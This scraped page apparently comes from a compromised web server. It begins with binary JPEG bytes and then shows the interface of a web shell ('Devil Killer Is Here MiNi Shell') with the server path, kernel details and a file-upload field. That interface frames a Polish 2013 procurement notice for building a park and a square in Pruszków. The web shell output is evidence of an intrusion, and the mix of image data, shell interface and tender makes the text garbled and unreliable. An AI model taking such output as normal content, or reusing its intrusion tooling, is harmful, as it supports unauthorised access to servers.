JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131018/425184-N-2013.html

<p class="kh_header"><b>Pruszków: Budowa parku - zagospodarowanie parku na osiedlu Bolesława Prusa (Żwirowiska) - etap III oraz Placu Kardynała Wyszyńskiego w Pruszkowie.</b><br>
<b>Numer ogłoszenia: 425184 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa parku - zagospodarowanie parku na osiedlu Bolesława Prusa (Żwirowiska) - etap III oraz Placu Kardynała Wyszyńskiego w Pruszkowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac:

REALIZACJA ZAGOSPODAROWANIA TERENÓW PARKOWYCH OSIEDLA IM.BOLESŁAWA PRUSA

Zakres zamówienia obejmuje realizację 2 zadań, odrębnych, ale powiązanych z sobą funkcjonalnie, przestrzennie oraz poprzez zastosowanie takich samych lub zbliżonych elementów wystroju.
ZADANIE 1. Plac im. Kardynała Stefana Wyszyńskiego.
ZADANIE 2. Park Żwirowisko- III ETAP realizacji.

ZADANIE 1. Plac im. Kardynała Stefana Wyszyńskiego

OPIS ZAKRESU ZAMÓWIENIA 

1. Projektowane zagospodarowanie terenu. Ogólne założenia programowo- przestrzenne.
Przestrzeń rozwiązana została w formie placu zielonego - łączącego elementy miejskiego skweru oraz wpisanych w jego układ płaszczyzn o charakterze placu- plateau wraz z funkcjonalnym układem komunikacyjnym - adaptowanym traktem ulicy, z zachowaniem geometrii jezdni i adaptacją części stanowisk parkingowych ..
Część projektowanego założenia, położona ponad poziomem ulicy, zagospodarowana została  w charakterze skweru, podpartego oporowym murem wysokości ca 0,7-1,0 m.
Główny plac  zamknięty w linii istniejącej skarpy szerokimi schodami prowadzącymi na górny poziom oraz symetrycznie usytuowanymi pochylniami dostosowanymi dla niepełnosprawnych. Na górnym poziomie plac posiada kontynuację z małą fontanną - płytą wodną .
W południowej części skweru zaprojektowana zostanie pochylnia łącząca założenie z układem dróg Parku Żwirowisko.
W ciągu ulicy zaprojektowano kanalizację deszczową zapewniającą odwodnienie zarówno ulicy, jak i stanowisk parkingowych, wód spływających z górnej części placu (schody, pochylnie, główny plac przy fontannie) oraz odwodnienie fontanny. Alejki skweru posiadają nawierzchnie przepuszczalne i dodatkowo odwadniane są, poprzez spadki poprzeczne, w teren.
Oświetlenie w trakcie ulicy rozwiązane będzie oprawami mocowanymi na słupach wys. ca. 4 m Od strony zachodniej ulica i stanowiska parkingowe oświetlone będą oprawami w nawierzchni podświetlającymi również szpaler drzew posadzonych w zagłębieniach muru.
Pozostałe oświetlenie rozwiązane zostanie przede wszystkim oprawami doziemnymi, o świetle zalewającym nawierzchnię jak również iluminującym, poprzez podświetlenie korony drzew i projektowaną fontannę oraz oprawy do-murkowe stanowiące podświetlenie wejść.

Zasilenie oświetlenia oraz pompy fontanny realizowane jest poprzez projektowane linie elektroenergetyczne kablowe prowadzące od szafki sytuowanej po zachodniej stronie kościoła.
Zasilenie fontanny w wodę zapewni projektowany przewód wodociągowy włączony do sieci miejskiej po północnej stronie projektowanego placu. W ciągu ulicy  zaprojektowana jest kanalizacja deszczowa stanowiąca również odwodnienie fontanny.



2. Zakres realizacji
a. Prace rozbiórkowe
- Rozbiórka nawierzchni jezdni asfaltowej wraz z podbudową		
- Rozbiórka nawierzchni asfaltowej boisk		
- rozbiórka nawierzchni stanowisk parkingowych z płyt betonowych- mon	       
- rozbiórka nawierzchni stanowisk parkingowych z łamanych płyt kamiennych
- rozbiórka chodnika .			       
- demontaż elementów betonowych, zbrojonych, w formie ściętych stożków    
   o podstawie średnicy 90 cm, średnicy zwieńczenia 30 cm wysokość 210 cm     
- demontaż  koszy do koszykówki- stalowych 					
- demontaż latarń wys. 4,0 m, słupy stalowe +oprawy			
- wycięcie i karczowanie drzewa - śliwa , 	

b. Roboty ziemne.
Niwelacja i modelowanie terenu dotyczy terenu położonego we wschodniej części projektowanego założenia, przeznaczonego pod urządzenie zielonego skweru stanowiącego integralną część założenia przestrzennego Placu, w tym podniesienie części terenu do proj. rzędnej

c. Budowa muru oporowego z schodami i pochylniami.
Murek oporowy z zbrojonego betonu architektonicznego zaprojektowany został w miejscu istniejącej skarpy i będzie elementem architektonicznym stanowiącym powiązanie części dolnej Placu ( ulica) z częścią zielonego skweru położonego na poziomie wyższym .

d. Wykonanie i montaż poręczy schodów i pochylni, balustrad zwieńczenia murku
Wszystkie poręcze i balustrady wykonane z rur stalowych, bez szwu, ocynkowanych ogniowo.

e. Budowa nawierzchni jezdnych i pieszych.
Nawierzchnie jezdne zaprojektowane zostały w świetle istniejącej jezdni, Wloty jezdni tj .włączenie w ul. Zasławską i w ul. Latter pozostawiono w istniejącej nawierzchni asfaltowej.
Nawierzchnie piesze zaprojektowane zostały w ciągu chodnika po zachodniej stronie jezdni, w pasie pomiędzy stanowiskami parkingowymi a murem oporowym, na powierzchno placów usytuowanych w południowej i północnej stronie założenia oraz w układzie placu i alejek położonych na poziomie górnym (skwer).

f. Budowa fontanny - płyty wodnej  
Fontanna- płyta wodna zlokalizowana jest na centralnym placu na poziomie górnym założenia ( skwer). Fontanna składa się z niecki( zbiornika) przekrytej płytami granitowymi ( na konstrukcji z kraty stalowej) 

g. Budowa przyłącza wodociągowego dla potrzeb fontanny

h. Budowa odwodnienia placu i fontanny
Projektowany ciąg kanalizacji deszczowej odwadniający powierzchnię modernizowanego placu oraz odprowadza nadmiar wody z fontanny, włącza się do istniejącego kanału deszczowego w ul. Plantowej. 

i. Budowa przyłącza i instalacji elektrycznej, oświetlenie
 Zakres obejmuje wykonanie przyłącza instalacji oświetleniowej i zasilenia urządzenia pompowni fontanny.

j. Montaż elementów wyposażenia.
-  ławki parkowe z oparciem	
- ławki parkowe bez oparcia 
- siedzisko z betonu płukanego 100x100x400 cm				
- kosze na śmieci pojemność 75l	
- elementy przestrzenne	- według indywidualnego projektu
							
k. Zakładanie zieleni.
- Prace agrotechniczne i przygotowawcze
- Zakładanie trawników dywanowych z siewu
- Sadzenie materiału roślinnego
-  Pielęgnacja w rocznym okresie gwarancyjnym


ZADANIE 2. Park Żwirowisko- III ETAP realizacji

OPIS ZAKRESU ZAMÓWIENIA 

1. Projektowane zagospodarowanie terenu. Ogólne założenia programowo- przestrzenne.


Modernizacja istniejącego parku osiedlowego, polega na  rozbudowie i uwspółcześnieniu programu rekreacyjnego oraz rekompozycji elementów zagospodarowania, a w tym rewitalizację układu wodnego Skarpy stawów oraz uskoki terenowe w rejonie dróg  umacniane są murkami i ścianami oporowymi z gabionów  Szczególnie istotnym elementem są tarasowane skarpy małego stawu oraz kaskada wodna .
Trakty komunikacyjne, o nawierzchni z płyt wielkoformatowych z betonu architektonicznego 2 x 1m, uzupełnianych płytami chodnikowymi 50x50cm oraz kostką granitową. 
Wprowadzenie roślinności pnącej i okrywowej służy złagodzeniu kontrastu z kamieniem gabionów. Zastosowano nasadzenia wodne i przywodne oraz masywy izolacyjne i maskujące dysharmonijne elementy otoczenia.
Oświetlenie parku jest realizowane w formie parkowych latarń wzdłuż głównych traktów komunikacyjnych oraz lokalnych iluminacji  tarasów, partii zieleni i elementów wodnych. 
W południowej części parku przewidziana jest lokalizacja skate-parku. W części wschodniej umieszczono niewielki plac zabaw dla dzieci.
Wyposażenie- ławki, kosze na śmieci oraz formy latarń dobrane są według katalogów.

2. Zakres zrealizowany w ramach Etapu I i II.
Większość elementów zagospodarowania parku zrealizowana została w ramach Etapu I i II
ZREALIZOWANO
- rewitalizację układu wodnego, polegającą na uregulowaniu stawów, wykonaniu dna, drenaży, rurociągów wymiany wody pompowni wraz z zasileniem. 
- wycinkę drzew i krzewów w rejonie prowadzonych prac ( projekt gospodarki drzewostanem) oraz rozbiórkę elementów architektury ogrodowej , nawierzchni.
- przyłącze energetyczne zasilenia parku, oraz pompowni wody 
- murki gabionowe, 
- kaskadę wodną
- modelowanie zagłębień terenowych.	 
- budowę dróg parkowych i placów (cześć centralna parku)  z wyłączeniem części przeznaczonej do realizacji w etapie III
- budowę schodów terenowych 
- budowę linii energetycznych kablowych wraz z budową linii elektroenergetycznej oświetleniowej - z wyłączeniem części przeznaczonej do realizacji 	w etapie III 
- montaż elementów wyposażenia (barierki- balustrady terenowe, ławki, i kosze na śmieci - w części centralnej parku, formy przestrzenne itp.) z wyłączeniem części przeznaczonej do realizacji w etapie III
 - realizacja nasadzeń roślinnych, wykonanie trawników z wyłączeniem części przeznaczonej do realizacji w etapie III

3. Zakres realizacji Etapu III.
a. Budowa drogi w północnej części parku - w dowiązaniu do placu im. Kardynała Stefana Wyszyńskiego.
	- nawierzchnie z płyt betonowych wielkoformatowych	
	-  nawierzchnia z płyt betonowych 50x50x7cm		
	- nawierzchnia z kostki granitowej

b. Budowa drogi w części południowej tj. pomiędzy koroną skarpy dużego stawu a ul. Brzozową 
	- nawierzchnie z płyt betonowych wielkoformatowych	
	-  nawierzchnia z płyt betonowych 50x50x7cm		
	- nawierzchnia z kostki granitowej 	

c. Budowa nawierzchni i wyposażenie skateparku
	- nawierzchnia asfaltobetonowa z powierzchnią novacrylic
	- wyposażenie według katalogu

d. Budowa zespołu placu zabaw 
	- ogrodzenie z furtkami	
	- nawierzchnie: syntetyczna typu Playtop, syntetyczna trawa, 	
           - nawierzchnia piaskowa
	- urządzenia zabawowe
	- tablice informacyjne, ławki, kosze na śmieci

e. Budowa linii kablowych i oświetlenie w części południowej, w tym oświetlenie skateparku

f. Zakładanie zieleni w części północnej na odcinku dowiązania do Placu im. Kardynała Wyszyńskiego
- Prace agrotechniczne i przygotowawcze
- Zakładanie trawników dywanowych z siewu
- Sadzenie materiału roślinnego
-  Pielęgnacja w rocznym okresie gwarancyjnym

g. Zakładanie zieleni w części południowej- zieleń w części północnej na odcinku dowiązania do Placu im. Kardynała Wyszyńskiego ( w tym gospodarka drzewostanem  w rejonie skateparku)
- Prace agrotechniczne i przygotowawcze
- Zakładanie trawników dywanowych z siewu
- Sadzenie materiału roślinnego
-  Pielęgnacja w rocznym okresie gwarancyjnym

h. Montaż elementów wyposażenia 
-  ławki parkowe z oparciem	
- ławki parkowe bez oparcia 			
- kosze na śmieci pojemność 75l

UWAGA:
Zakres Zadania 1 i Zadania 2 - ETAP III uwidoczniony został na planszy w skali 1:500 - ETAPOWANIE.
W części opisowej oraz w specyfikacjach technicznych  wykreślone zostały rozdziały ( lub ich fragmenty) dotyczące zadań już zrealizowanych .
Z części rysunkowej usunięto rysunki dotyczące zadań  zrealizowanych 
Odnośnie Zadania 2 - etap III należy uwzględnić korekty wynikające z powykonawczej dokumentacji geodezyjnej w zakresach zrealizowanych w ETAPIE I i ETAPIE II.
Elementy wyposażenia (ławki i kosze na śmieci ) oraz elementy oświetlenia - słupy oraz oprawy oświetlenia słupowego MUSZĄ BYĆ TOŻSAME z zrealizowanymi w ramach Zadania 2 - ETAP I i  II
Wykonawca, na etapie składania oferty, zobowiązany jest przedstawić karty katalogowe wybranych nawierzchni oraz  wszystkich elementów wyposażenia tj.
- nawierzchni syntetycznej placu zabaw dla dzieci
- sztucznej trawy
- nawierzchni akrylowej- wierzchniej warstwy skateparku
oraz
- ławek
- koszów na śmieci
- urządzeń wyposażenia placu zabaw
- elementów wyposażenia skateparku
- opraw oświetlenia
parafowane przez producenta lub dystrybutora..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 Ustawy Pzp do wysokości 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.11.27.11-2, 45.11.12.00-0, 45.23.31.20-6, 45.23.31.23-7, 45.11.27.23-9, 45.31.23.11-0, 45.31.43.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem ważności oferty jest wniesienie przez Wykonawcę WADIUM o wartości: 30 000,00zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem  robót budowlanych  w okresie ostatnich 5 latach przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  - w tym okresie, oraz załączy dowody dotyczące najważniejszych robót określające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone w tym:
- nie mniej niż 1 zamówienie odpowiadające swoim rodzajem robotom budowlanym stanowiącym 
  przedmiot zamówienia, tj.: polegające na budowie lub modernizacji obiektów parkowych. 
Każda przedstawiona praca musi mieć wartość min. 900 000,00zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie uznany za spełniony jeżeli Wykonawca wykaże się - dysponowaniem osobami zdolnymi do wykonania zamówienia w tym minimum:
- 1 osobą posiadającą uprawnienia budowlane wykonawcze w specjalności konstrukcyjno budowlanej, 
wpisaną na listę członków właściwej Regionalnej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- nie mniej niż 1 zamówienie odpowiadające swoim rodzajem robotom budowlanym stanowiącym 
  przedmiot zamówienia, tj.: polegające na budowie lub modernizacji obiektów parkowych. 
Każda przedstawiona praca musi mieć wartość min. 900 000,00zł.;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę
1) Formularz ofertowy (według załączonego druku) 
2) Kosztorys ofertowy w formie uproszczonej 
3) Dowód wpłacenia (wniesienia) wadium 
4) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
     UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 
5) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom 
6) Karty katalogowe wybranych nawierzchni oraz  wszystkich elementów wyposażenia.</p>

